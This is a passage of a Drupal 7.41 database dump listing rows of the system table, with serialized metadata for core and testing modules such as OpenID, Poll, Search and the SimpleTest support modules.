testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/openid/openid.module','openid','module','',0,0,-1,0,'a:12:{s:4:\"name\";s:6:\"OpenID\";s:11:\"description\";s:48:\"Allows users to log into your site using OpenID.\";s:7:\"version\";s:4:\"7.41\";s:7:\"package\";s:4:\"Core\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:11:\"openid.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/openid/tests/openid_test.module','openid_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:21:\"OpenID dummy provider\";s:11:\"description\";s:33:\"OpenID provider used for testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:6:\"openid\";}s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/overlay/overlay.module','overlay','module','',1,1,0,0,'a:12:{s:4:\"name\";s:7:\"Overlay\";s:11:\"description\";s:59:\"Displays the Drupal administration interface in an overlay.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/path/path.module','path','module','',1,0,0,0,'a:13:{s:4:\"name\";s:4:\"Path\";s:11:\"description\";s:28:\"Allows users to rename URLs.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:9:\"path.test\";}s:9:\"configure\";s:24:\"admin/config/search/path\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/php/php.module','php','module','',1,0,0,0,'a:12:{s:4:\"name\";s:10:\"PHP filter\";s:11:\"description\";s:50:\"Allows embedded PHP code/snippets to be evaluated.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:8:\"php.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/poll/poll.module','poll','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:4:\"Poll\";s:11:\"description\";s:95:\"Allows your site to capture votes on different topics in the form of multiple choice questions.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:9:\"poll.test\";}s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:8:\"poll.css\";s:21:\"modules/poll/poll.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/profile/profile.module','profile','module','',0,0,-1,0,'a:14:{s:4:\"name\";s:7:\"Profile\";s:11:\"description\";s:36:\"Supports configurable user profiles.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:12:\"profile.test\";}s:9:\"configure\";s:27:\"admin/config/people/profile\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/rdf/rdf.module','rdf','module','',1,0,0,0,'a:12:{s:4:\"name\";s:3:\"RDF\";s:11:\"description\";s:148:\"Enriches your content with metadata to let other applications (e.g. search engines, aggregators) better understand its relationships and attributes.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:8:\"rdf.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/rdf/tests/rdf_test.module','rdf_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:16:\"RDF module tests\";s:11:\"description\";s:38:\"Support module for RDF module testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/search/search.module','search','module','',1,0,7000,0,'a:14:{s:4:\"name\";s:6:\"Search\";s:11:\"description\";s:36:\"Enables site-wide keyword searching.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:2:{i:0;s:19:\"search.extender.inc\";i:1;s:11:\"search.test\";}s:9:\"configure\";s:28:\"admin/config/search/settings\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"search.css\";s:25:\"modules/search/search.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/search/tests/search_embedded_form.module','search_embedded_form','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:20:\"Search embedded form\";s:11:\"description\";s:59:\"Support module for search module testing of embedded forms.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/search/tests/search_extra_type.module','search_extra_type','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:16:\"Test search type\";s:11:\"description\";s:41:\"Support module for search module testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/search/tests/search_node_tags.module','search_node_tags','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:21:\"Test search node tags\";s:11:\"description\";s:44:\"Support module for Node search tags testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/shortcut/shortcut.module','shortcut','module','',1,0,0,0,'a:13:{s:4:\"name\";s:8:\"Shortcut\";s:11:\"description\";s:60:\"Allows users to manage customizable lists of shortcut links.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:13:\"shortcut.test\";}s:9:\"configure\";s:36:\"admin/config/user-interface/shortcut\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/simpletest/simpletest.module','simpletest','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:7:\"Testing\";s:11:\"description\";s:53:\"Provides a framework for unit and functional testing.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:50:{i:0;s:15:\"simpletest.test\";i:1;s:24:\"drupal_web_test_case.php\";i:2;s:18:\"tests/actions.test\";i:3;s:15:\"tests/ajax.test\";i:4;s:16:\"tests/batch.test\";i:5;s:15:\"tests/boot.test\";i:6;s:20:\"tests/bootstrap.test\";i:7;s:16:\"tests/cache.test\";i:8;s:17:\"tests/common.test\";i:9;s:24:\"tests/database_test.test\";i:10;s:22:\"tests/entity_crud.test\";i:11;s:32:\"tests/entity_crud_hook_test.test\";i:12;s:23:\"tests/entity_query.test\";i:13;s:16:\"tests/error.test\";i:14;s:15:\"tests/file.test\";i:15;s:23:\"tests/filetransfer.test\";i:16;s:15:\"tests/form.test\";i:17;s:16:\"tests/graph.test\";i:18;s:16:\"tests/image.test\";i:19;s:15:\"tests/lock.test\";i:20;s:15:\"tests/mail.test\";i:21;s:15:\"tests/menu.test\";i:22;s:17:\"tests/module.test\";i:23;s:16:\"tests/pager.test\";i:24;s:19:\"tests/password.test\";i:25;s:15:\"tests/path.test\";i:26;s:19:\"tests/registry.test\";i:27;s:17:\"tests/schema.test\";i:28;s:18:\"tests/session.test\";i:29;s:20:\"tests/tablesort.test\";i:30;s:16:\"tests/theme.test\";i:31;s:18:\"tests/unicode.test\";i:32;s:17:\"tests/update.test\";i:33;s:17:\"tests/xmlrpc.test\";i:34;s:26:\"tests/upgrade/upgrade.test\";i:35;s:34:\"tests/upgrade/upgrade.comment.test\";i:36;s:33:\"tests/upgrade/upgrade.filter.test\";i:37;s:32:\"tests/upgrade/upgrade.forum.test\";i:38;s:33:\"tests/upgrade/upgrade.locale.test\";i:39;s:31:\"tests/upgrade/upgrade.menu.test\";i:40;s:31:\"tests/upgrade/upgrade.node.test\";i:41;s:35:\"tests/upgrade/upgrade.taxonomy.test\";i:42;s:34:\"tests/upgrade/upgrade.trigger.test\";i:43;s:39:\"tests/upgrade/upgrade.translatable.test\";i:44;s:33:\"tests/upgrade/upgrade.upload.test\";i:45;s:31:\"tests/upgrade/upgrade.user.test\";i:46;s:36:\"tests/upgrade/update.aggregator.test\";i:47;s:33:\"tests/upgrade/update.trigger.test\";i:48;s:31:\"tests/upgrade/update.field.test\";i:49;s:30:\"tests/upgrade/update.user.test\";}s:9:\"configure\";s:41:\"admin/config/development/testing/settings\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/actions_loop_test.module','actions_loop_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:17:\"Actions loop test\";s:11:\"description\";s:39:\"Support module for action loop testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/ajax_forms_test.module','ajax_forms_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:26:\"AJAX form test mock module\";s:11:\"description\";s:25:\"Test for AJAX form calls.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/ajax_test.module','ajax_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:9:\"AJAX Test\";s:11:\"description\";s:40:\"Support module for AJAX framework tests.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/batch_test.module','batch_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:14:\"Batch API test\";s:11:\"description\";s:35:\"Support module for Batch API tests.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/boot_test_1.module','boot_test_1','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:21:\"Early bootstrap tests\";s:11:\"description\";s:39:\"A support module for hook_boot testing.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/boot_test_2.module','boot_test_2','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:21:\"Early bootstrap tests\";s:11:\"description\";s:44:\"A support module for hook_boot hook testing.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/common_test.module','common_test','module','',0,0,-1,0,'a:14:{s:4:\"name\";s:11:\"Common Test\";s:11:\"description\";s:32:\"Support module for Common tests.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:15:\"common_test.css\";s:40:\"modules/simpletest/tests/common_test.css\";}s:5:\"print\";a:1:{s:21:\"common_test.print.css\";s:46:\"modules/simpletest/tests/common_test.print.css\";}}s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/common_test_cron_helper.module','common_test_cron_helper','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:23:\"Common Test Cron Helper\";s:11:\"description\";s:56:\"Helper module for CronRunTestCase::testCronExceptions().\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/database_test.module','database_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:13:\"Database Test\";s:11:\"description\";s:40:\"Support module for Database layer tests.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/drupal_autoload_test/drupal_autoload_test.module','drupal_autoload_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:25:\"Drupal code registry test\";s:11:\"description\";s:45:\"Support module for testing the code registry.\";s:5:\"files\";a:2:{i:0;s:34:\"drupal_autoload_test_interface.inc\";i:1;s:30:\"drupal_autoload_test_class.inc\";}s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/drupal_system_listing_compatible_test/drupal_system_listing_compatible_test.module','drupal_system_listing_compatible_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:37:\"Drupal system listing compatible test\";s:11:\"description\";s:62:\"Support module for testing the drupal_system_listing function.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/drupal_system_listing_incompatible_test/drupal_system_listing_incompatible_test.module','drupal_system_listing_incompatible_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:39:\"Drupal system listing incompatible test\";s:11:\"description\";s:62:\"Support module for testing the drupal_system_listing function.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/entity_cache_test.module','entity_cache_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:17:\"Entity cache test\";s:11:\"description\";s:40:\"Support module for testing entity cache.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:28:\"entity_cache_test_dependency\";}s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/entity_cache_test_dependency.module','entity_cache_test_dependency','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:28:\"Entity cache test dependency\";s:11:\"description\";s:51:\"Support dependency module for testing entity cache.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/entity_crud_hook_test.module','entity_crud_hook_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:22:\"Entity CRUD Hooks Test\";s:11:\"description\";s:35:\"Support module for CRUD hook tests.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/entity_query_access_test.module','entity_query_access_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:24:\"Entity query access test\";s:11:\"description\";s:49:\"Support module for checking entity query results.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/error_test.module','error_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:10:\"Error test\";s:11:\"description\";s:47:\"Support module for error and exception testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/file_test.module','file_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:9:\"File test\";s:11:\"description\";s:39:\"Support module for file handling tests.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:16:\"file_test.module\";}s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/filter_test.module','filter_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:18:\"Filter test module\";s:11:\"description\";s:33:\"Tests filter hooks and functions.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/form_test.module','form_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:12:\"FormAPI Test\";s:11:\"description\";s:34:\"Support module for Form API tests.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/image_test.module','image_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:10:\"Image test\";s:11:\"description\";s:39:\"Support module for image toolkit tests.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/menu_test.module','menu_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:15:\"Hook menu tests\";s:11:\"description\";s:37:\"Support module for menu hook testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/module_test.module','module_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:11:\"Module test\";s:11:\"description\";s:41:\"Support module for module system testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/path_test.module','path_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:15:\"Hook path tests\";s:11:\"description\";s:37:\"Support module for path hook testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/psr_0_test/psr_0_test.module','psr_0_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:16:\"PSR-0 Test cases\";s:11:\"description\";s:44:\"Test classes to be discovered by simpletest.\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/psr_4_test/psr_4_test.module','psr_4_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:16:\"PSR-4 Test cases\";s:11:\"description\";s:44:\"Test classes to be discovered by simpletest.\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/requirements1_test.module','requirements1_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:19:\"Requirements 1 Test\";s:11:\"description\";s:80:\"Tests that a module is not installed when it fails hook_requirements(\'install\').\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/requirements2_test.module','requirements2_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:19:\"Requirements 2 Test\";s:11:\"description\";s:98:\"Tests that a module is not installed when the one it depends on fails 